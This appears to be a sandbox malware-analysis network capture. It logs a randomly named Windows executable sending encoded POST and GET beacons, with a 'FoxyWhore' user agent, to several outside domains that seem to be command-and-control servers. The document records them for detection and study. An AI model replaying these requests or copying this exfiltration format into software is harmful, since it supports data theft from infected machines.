                                                          Jan 16, 2025 09:26:07.657269955 CET306INHTTP/1.1 404 Not Found
                                                          Content-Length: 146
                                                          Content-Type: text/html
                                                          Date: Thu, 16 Jan 2025 08:26:07 GMT
                                                          Server: nginx
                                                          X-Cache: BYPASS
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          22192.168.2.549997134.122.133.80803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:26:09.338294983 CET784OUTPOST /jpjz/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.jrcov55qgcxp5fwa.top
                                                          Origin: http://www.jrcov55qgcxp5fwa.top
                                                          Cache-Control: max-age=0
                                                          Content-Length: 228
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.jrcov55qgcxp5fwa.top/jpjz/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Raw: 52 34 53 74 6a 32 6b 3d 4d 75 71 68 35 56 50 4c 50 74 43 4d 6d 42 6e 66 42 5a 6b 74 69 65 39 74 61 54 34 77 7a 58 6c 71 54 44 6f 32 33 58 68 57 2f 6d 35 78 36 38 58 6d 7a 51 4f 77 6d 55 4f 50 74 6a 31 52 52 31 72 4b 77 69 6b 4b 6f 51 5a 4b 4a 6f 4b 57 78 50 7a 59 6a 72 2f 53 65 43 57 69 46 37 7a 56 57 44 32 47 6a 70 32 71 69 54 37 56 6d 47 53 54 52 2b 6d 52 76 53 79 64 49 75 57 64 48 7a 64 72 55 70 42 4e 4f 4e 61 4c 34 4f 5a 35 48 6a 54 50 6a 31 6e 4a 79 61 53 65 65 4a 36 7a 72 71 59 50 54 2f 2b 47 73 55 30 6f 73 4d 6a 39 76 35 31 48 78 7a 63 5a 55 6c 4c 72 38 50 39 6a 4b 57 48 32 73 58 6d 71 43 4b 50 52 30 44 4c 75 49 68 30 41 37 61 35 73 34 52 65 41 42 6d 36 41 66 2f 74 42
                                                          Data Ascii: R4Stj2k=Muqh5VPLPtCMmBnfBZktie9taT4wzXlqTDo23XhW/m5x68XmzQOwmUOPtj1RR1rKwikKoQZKJoKWxPzYjr/SeCWiF7zVWD2Gjp2qiT7VmGSTR+mRvSydIuWdHzdrUpBNONaL4OZ5HjTPj1nJyaSeeJ6zrqYPT/+GsU0osMj9v51HxzcZUlLr8P9jKWH2sXmqCKPR0DLuIh0A7a5s4ReABm6Af/tB
                                                          Jan 16, 2025 09:26:10.214730024 CET306INHTTP/1.1 404 Not Found
                                                          Content-Length: 146
                                                          Content-Type: text/html
                                                          Date: Thu, 16 Jan 2025 08:26:10 GMT
                                                          Server: nginx
                                                          X-Cache: BYPASS
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          23192.168.2.549998134.122.133.80803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:26:11.889775038 CET1801OUTPOST /jpjz/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.jrcov55qgcxp5fwa.top
                                                          Origin: http://www.jrcov55qgcxp5fwa.top
                                                          Cache-Control: max-age=0
                                                          Content-Length: 1244
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.jrcov55qgcxp5fwa.top/jpjz/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Raw: 52 34 53 74 6a 32 6b 3d 4d 75 71 68 35 56 50 4c 50 74 43 4d 6d 42 6e 66 42 5a 6b 74 69 65 39 74 61 54 34 77 7a 58 6c 71 54 44 6f 32 33 58 68 57 2f 6d 78 78 37 4f 76 6d 79 33 61 77 67 6b 4f 50 6c 44 31 4d 52 31 72 4c 77 69 63 52 6f 51 6c 30 4a 74 4f 57 77 75 54 59 30 4b 2f 53 51 43 57 69 4e 62 7a 57 59 6a 32 54 6a 70 6d 6d 69 54 72 56 6d 47 53 54 52 38 2b 52 74 41 61 64 4f 75 57 65 47 7a 64 6e 43 5a 42 70 4f 4e 7a 77 34 4f 55 4f 48 51 72 50 67 56 33 4a 30 6f 36 65 57 4a 36 78 6d 4b 59 48 54 2f 79 6a 73 55 42 58 73 50 2f 62 76 35 4e 48 38 46 68 34 4a 6e 33 57 69 39 39 44 42 32 66 33 78 77 65 57 63 72 54 55 75 52 4c 70 41 6a 51 57 35 66 6b 68 72 77 4f 4d 64 77 4b 70 52 61 46 50 64 2b 6b 74 58 53 63 42 72 54 30 45 4a 54 70 2b 72 75 31 44 44 4b 37 69 33 43 57 47 59 38 30 72 59 71 4f 6c 76 47 49 44 58 42 7a 62 53 33 70 2b 34 4e 4b 35 44 4a 47 4c 4a 4d 2b 38 4e 4b 44 47 39 63 38 68 67 36 6c 4a 59 53 44 6b 50 59 4b 69 53 30 75 4e 4d 6a 41 71 42 77 42 62 66 6a 6a 76 7a 43 61 4b 2f 6f 7a 36 47 36 6b 7a 50 75 [TRUNCATED]
                                                          Data Ascii: R4Stj2k=Muqh5VPLPtCMmBnfBZktie9taT4wzXlqTDo23XhW/mxx7Ovmy3awgkOPlD1MR1rLwicRoQl0JtOWwuTY0K/SQCWiNbzWYj2TjpmmiTrVmGSTR8+RtAadOuWeGzdnCZBpONzw4OUOHQrPgV3J0o6eWJ6xmKYHT/yjsUBXsP/bv5NH8Fh4Jn3Wi99DB2f3xweWcrTUuRLpAjQW5fkhrwOMdwKpRaFPd+ktXScBrT0EJTp+ru1DDK7i3CWGY80rYqOlvGIDXBzbS3p+4NK5DJGLJM+8NKDG9c8hg6lJYSDkPYKiS0uNMjAqBwBbfjjvzCaK/oz6G6kzPumdmmwNN+H44e8zYNqLbPrhS3Cw90jHOJPacEAbxiqOvrOwHHntBbwiS83oCce2xtZlpOsGRIUYrI25kw4ogGSjgHAyW0uXpNAWoM5DpCvDiLM2enUFziSnN6Kbeb7hAQzJ5oyi1/pNxGyK2EZR/kZSqVx/xEloQdHeH7HSujQZAglSK7BQF+7JpwsPfRAmY6bflO6Ut5mFekrC/YGZjvZfQ87Ou2DXr7prDmZJw6a2WadPde9FSx74uIU9+t8lXUUNQgObIKDsfkvR6G+eqwXQTPnn/qj6109+pPQRouGW58bLoWpn3h9fbnD9bpqvmt9o10vUGXuxjcCG+oUsANS7AFyoBJ6bej4+x5Rja9TVjPgJdldZzAayNqgzdoReOfvme7DGuVzALwgRcBoGyHaprSVNbpdE7sNEEGWc+xf4J+yK8ZAEs+Ve+AesgOku2jRRrtR+LdSgO74dqeJ1VwJZ9SBiv0gFre8S7UXS/m05r4hhPut5SQCA57lgramINAcq54CfungF85rOIA7Tbd8pqzJ7fPEGMBbkKf35V79YOY69g8rEeStwyOVmcbzduaXWw6aMMXifm6FHBe57NxbHzX9iEEaffSX64loqd3cebXzb1QogKkpb8XvvmYcIR9wBN3nniwQJ6Uxli6s2X2puQsmKqpcBNk4n [TRUNCATED]
                                                          Jan 16, 2025 09:26:12.768207073 CET306INHTTP/1.1 404 Not Found
                                                          Content-Length: 146
                                                          Content-Type: text/html
                                                          Date: Thu, 16 Jan 2025 08:26:12 GMT
                                                          Server: nginx
                                                          X-Cache: BYPASS
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          24192.168.2.549999134.122.133.80803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:26:14.428988934 CET492OUTGET /jpjz/?R4Stj2k=BsCB6j6XIP/wuAb0HPY9posnISoRnnooDDFnz1MrtzBPzJTq92en/EOyrjYaLx3w2H4L+FlVDICDydTs7KXcXHKBDP7KaxaAnbP80R2HqmHJM+3O9yicYOmuDElRRJIzTA==&ml=PF-8nXUHD HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.jrcov55qgcxp5fwa.top
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Jan 16, 2025 09:26:15.294491053 CET306INHTTP/1.1 404 Not Found
                                                          Content-Length: 146
                                                          Content-Type: text/html
                                                          Date: Thu, 16 Jan 2025 08:26:15 GMT
                                                          Server: nginx
                                                          X-Cache: BYPASS
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          25192.168.2.55000047.83.1.90803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:26:20.353866100 CET737OUTPOST /ctdy/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.adadev.info
                                                          Origin: http://www.adadev.info
                                                          Cache-Control: max-age=0
                                                          Content-Length: 208
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.adadev.info/ctdy/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Raw: 52 34 53 74 6a 32 6b 3d 30 61 6e 71 6a 69 36 67 51 54 37 79 4c 30 76 4c 7a 51 4e 4d 74 49 65 4e 79 2b 6f 49 4b 58 5a 53 6d 48 63 2b 49 6a 57 39 4c 4f 7a 42 51 38 61 4c 55 31 38 49 48 71 78 67 51 4c 69 6b 54 6c 4b 31 43 32 31 45 74 46 71 63 6f 67 6f 67 51 51 57 43 47 69 51 37 50 52 30 53 31 32 6f 7a 36 30 2f 74 39 4a 39 32 48 2b 65 48 45 46 68 30 6e 49 45 6a 36 4f 4c 70 4e 64 2f 30 43 66 48 31 50 6a 43 36 66 44 41 4b 4f 42 5a 35 78 4d 6a 62 33 74 44 31 37 56 57 5a 77 75 71 30 34 45 52 55 48 70 78 2b 4a 65 68 38 71 64 36 67 36 58 30 4d 53 4e 70 4e 70 36 35 4a 79 76 66 56 4a 32 7a 44 53 4e 30 79 35 56 6b 63 72 48 63 3d
                                                          Data Ascii: R4Stj2k=0anqji6gQT7yL0vLzQNMtIeNy+oIKXZSmHc+IjW9LOzBQ8aLU18IHqxgQLikTlK1C21EtFqcogogQQWCGiQ7PR0S12oz60/t9J92H+eHEFh0nIEj6OLpNd/0CfH1PjC6fDAKOBZ5xMjb3tD17VWZwuq04ERUHpx+Jeh8qd6g6X0MSNpNp65JyvfVJ2zDSN0y5VkcrHc=
                                                          Jan 16, 2025 09:26:21.783191919 CET137INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.18.0
                                                          Date: Thu, 16 Jan 2025 08:26:21 GMT
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          26192.168.2.55000147.83.1.90803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:26:22.909233093 CET757OUTPOST /ctdy/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.adadev.info
                                                          Origin: http://www.adadev.info
                                                          Cache-Control: max-age=0
                                                          Content-Length: 228
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.adadev.info/ctdy/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Raw: 52 34 53 74 6a 32 6b 3d 30 61 6e 71 6a 69 36 67 51 54 37 79 5a 46 66 4c 2f 58 5a 4d 76 6f 65 4d 73 75 6f 49 54 48 5a 65 6d 48 51 2b 49 6d 32 54 4c 38 58 42 54 64 71 4c 56 30 38 49 45 71 78 67 59 72 69 6c 4e 56 4b 36 43 78 38 6e 74 45 57 63 6f 67 73 67 51 52 6d 43 47 54 51 38 4f 42 30 51 38 57 6f 78 6e 6b 2f 74 39 4a 39 32 48 2b 4c 69 45 46 70 30 6d 37 73 6a 36 76 4c 75 4f 64 2f 7a 53 50 48 31 59 7a 43 45 66 44 41 34 4f 45 6b 69 78 4f 72 62 33 73 7a 31 36 45 57 65 36 75 71 32 6c 30 51 49 58 4a 51 72 49 5a 42 68 33 65 37 63 6b 30 34 56 65 62 59 6e 7a 59 78 68 68 50 7a 74 5a 6c 37 30 44 39 56 62 6a 32 30 73 31 51 4c 67 75 5a 32 35 33 65 57 6d 43 44 75 64 55 2b 77 4d 72 66 58 7a
                                                          Data Ascii: R4Stj2k=0anqji6gQT7yZFfL/XZMvoeMsuoITHZemHQ+Im2TL8XBTdqLV08IEqxgYrilNVK6Cx8ntEWcogsgQRmCGTQ8OB0Q8Woxnk/t9J92H+LiEFp0m7sj6vLuOd/zSPH1YzCEfDA4OEkixOrb3sz16EWe6uq2l0QIXJQrIZBh3e7ck04VebYnzYxhhPztZl70D9Vbj20s1QLguZ253eWmCDudU+wMrfXz
                                                          Jan 16, 2025 09:26:24.350336075 CET137INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.18.0
                                                          Date: Thu, 16 Jan 2025 08:26:24 GMT
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          27192.168.2.55000247.83.1.90803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:26:25.452495098 CET1774OUTPOST /ctdy/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.adadev.info
                                                          Origin: http://www.adadev.info
                                                          Cache-Control: max-age=0
                                                          Content-Length: 1244
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.adadev.info/ctdy/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Raw: 52 34 53 74 6a 32 6b 3d 30 61 6e 71 6a 69 36 67 51 54 37 79 5a 46 66 4c 2f 58 5a 4d 76 6f 65 4d 73 75 6f 49 54 48 5a 65 6d 48 51 2b 49 6d 32 54 4c 38 66 42 54 75 79 4c 55 58 6b 49 46 71 78 67 62 72 69 6f 4e 56 4b 6a 43 33 55 37 74 45 61 6d 6f 6a 59 67 66 54 65 43 41 6e 38 38 48 42 30 51 2b 57 6f 77 36 30 2f 34 39 4a 74 36 48 2b 62 69 45 46 70 30 6d 2b 6f 6a 38 2b 4c 75 49 64 2f 30 43 66 48 51 50 6a 43 2f 66 44 6f 6f 4f 46 30 79 79 2f 4c 62 32 4d 6a 31 35 32 75 65 79 75 71 77 31 6b 51 41 58 4a 64 37 49 59 70 74 33 64 6e 69 6b 30 77 56 63 38 78 75 70 4a 55 2b 69 66 37 55 52 46 76 4e 64 71 4e 69 73 67 77 69 31 43 50 4e 6f 49 32 57 2f 37 62 6c 42 67 32 56 4b 36 74 57 6d 59 79 73 38 6d 6b 72 46 39 53 6e 2b 4d 58 71 39 6f 55 6c 33 61 5a 6e 39 30 57 78 4f 47 4b 31 69 57 75 6a 56 41 56 66 38 50 35 34 76 61 2f 68 42 65 6b 47 33 37 46 6b 79 4a 48 66 34 76 4d 67 65 58 68 79 35 38 72 30 6b 49 4d 47 48 65 6c 31 34 65 65 4b 70 31 37 4f 33 42 59 54 75 31 61 68 70 31 58 66 51 78 7a 4d 36 77 49 79 70 32 50 34 6e 46 [TRUNCATED]
                                                          Data Ascii: R4Stj2k=0anqji6gQT7yZFfL/XZMvoeMsuoITHZemHQ+Im2TL8fBTuyLUXkIFqxgbrioNVKjC3U7tEamojYgfTeCAn88HB0Q+Wow60/49Jt6H+biEFp0m+oj8+LuId/0CfHQPjC/fDooOF0yy/Lb2Mj152ueyuqw1kQAXJd7IYpt3dnik0wVc8xupJU+if7URFvNdqNisgwi1CPNoI2W/7blBg2VK6tWmYys8mkrF9Sn+MXq9oUl3aZn90WxOGK1iWujVAVf8P54va/hBekG37FkyJHf4vMgeXhy58r0kIMGHel14eeKp17O3BYTu1ahp1XfQxzM6wIyp2P4nFPd0n2WgsG+WFzoZkDYBcxD991hm15GkHeaiYTWlqeAB02Cb5liJ9UbOgqC5OrBA1ZZMrP7Nc+O2yZOO9GxFI1Z0PFGcyeTkKpS7+sCpAQqLshKEFXdKLr7aTpfn66sve7hefCxJGJtWoi2fC9NlRwpBQTTwoxWzuni55LBAo8YNE5rWTBKys5JErRsWGjh6Fx/Xq3n0LRsvTWAlYQQtg2B1yoAyDxD7ZaOby1nHUVQRio/XVJt8R3IoJKd3xboq5tyPJeMCJiLuFBR/Dp/XndcCRVM8Bx9r5uN8SJm3/gfrATIAzyG7qpII4CugdRlmgBEky15SbVlOiW/yv2epnpO9h53zkO+9bVu3OtMUUPLMjmwluuOdY1PF7F3s0IA54Kbd31aoDFhnNm1BvAgOhm3gxOmB9iPAS5iNTk0hhOuOvVSCC2gxU4H6THjYNoNMx//mQ3dwrlGFZraVh6jI/V9yQrvD4j1xKuRPeAYRrcFRLaV47FmaNBnbVj/p50Yb2/bzi2Eg4FXhcNwZso8WVNDq1svOHR8h1DD0UZkQWcLlqVk20T3Z1/mxkpKpQkC4x7m8qQk/V2qeazW9ROFrP1N9m6tLECsCuvj7umU0zvidwECUQVhKjnwpqVUpocljNM4kLJk862aJLdMQQTxPMHQbAJrFOoRi31W [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          28192.168.2.55000347.83.1.90803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:26:27.991368055 CET483OUTGET /ctdy/?ml=PF-8nXUHD&R4Stj2k=5YPKgWGFQCLPNGrLxhxItoeNmOBaThMtkX9bUS/ECNXraKmEQnwhGYNyQa7ZIE66IC9AyTOQsA8Uagq2DQsZHUsO9SJV5WPis6dAAfaCKHAM87QjltbifMPVPoLSKwbdMw== HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.adadev.info
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Jan 16, 2025 09:26:29.598229885 CET139INHTTP/1.1 567 unknown
                                                          Server: nginx/1.18.0
                                                          Date: Thu, 16 Jan 2025 08:26:29 GMT
                                                          Content-Length: 17
                                                          Connection: close
                                                          Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                          Data Ascii: Request too large


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          29192.168.2.550004188.114.96.3803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:26:34.657100916 CET740OUTPOST /8rr3/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.cifasnc.info
                                                          Origin: http://www.cifasnc.info
                                                          Cache-Control: max-age=0
                                                          Content-Length: 208
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.cifasnc.info/8rr3/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Raw: 52 34 53 74 6a 32 6b 3d 76 4c 55 42 6c 6d 50 52 4b 6b 32 62 79 65 46 2f 71 67 46 34 34 76 6f 43 50 52 63 52 77 65 32 69 56 65 70 64 6c 52 2f 5a 76 52 74 61 54 55 34 38 6d 64 65 73 35 4b 6b 4a 4a 53 69 69 59 4b 33 56 70 4c 76 68 42 57 48 70 65 57 2f 77 66 6e 56 71 41 39 6f 57 2b 32 58 35 4a 30 62 59 34 4d 2f 30 56 56 50 70 6f 43 31 6e 36 34 50 6e 44 57 34 77 66 4d 43 66 69 6e 63 30 42 57 6f 66 66 51 72 69 6c 4b 65 4f 62 2b 2b 72 75 76 59 71 65 79 37 50 56 59 31 52 73 5a 64 6c 6e 4e 79 6f 58 38 39 47 69 6a 72 2b 72 65 6c 77 6c 49 47 30 4c 7a 48 64 79 6e 37 56 32 56 4e 6e 65 72 45 4c 6b 70 34 45 66 54 34 2b 5a 49 51 3d
                                                          Data Ascii: R4Stj2k=vLUBlmPRKk2byeF/qgF44voCPRcRwe2iVepdlR/ZvRtaTU48mdes5KkJJSiiYK3VpLvhBWHpeW/wfnVqA9oW+2X5J0bY4M/0VVPpoC1n64PnDW4wfMCfinc0BWoffQrilKeOb++ruvYqey7PVY1RsZdlnNyoX89Gijr+relwlIG0LzHdyn7V2VNnerELkp4EfT4+ZIQ=
                                                          Jan 16, 2025 09:26:35.237520933 CET1236INHTTP/1.1 404 Not Found
                                                          Date: Thu, 16 Jan 2025 08:26:35 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          x-pingback: http://cifasnc.info/xmlrpc.php
                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          last-modified: Thu, 16 Jan 2025 08:26:35 GMT
                                                          cache-control: no-cache, must-revalidate, max-age=0
                                                          pragma: no-cache
                                                          vary: Accept-Encoding,User-Agent
                                                          x-turbo-charged-by: LiteSpeed
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cbQxDok4yUYG5qBuv3QGBZTXN1BAzF9TZV3kRgA4ojlqeLvEIwQjatNIdLBaUnytMJnkXii0x23tJCFBdpvWR7MbmcdNSLBirGb8%2Bu6R2qxT1r4racD05ooIrYr%2FvLWeA9T%2B"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 902cb8b11de48268-IAD
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7345&min_rtt=7345&rtt_var=3672&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=740&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 35 31 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c e2 20 b4 48
                                                          Data Ascii: 512Wo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L H
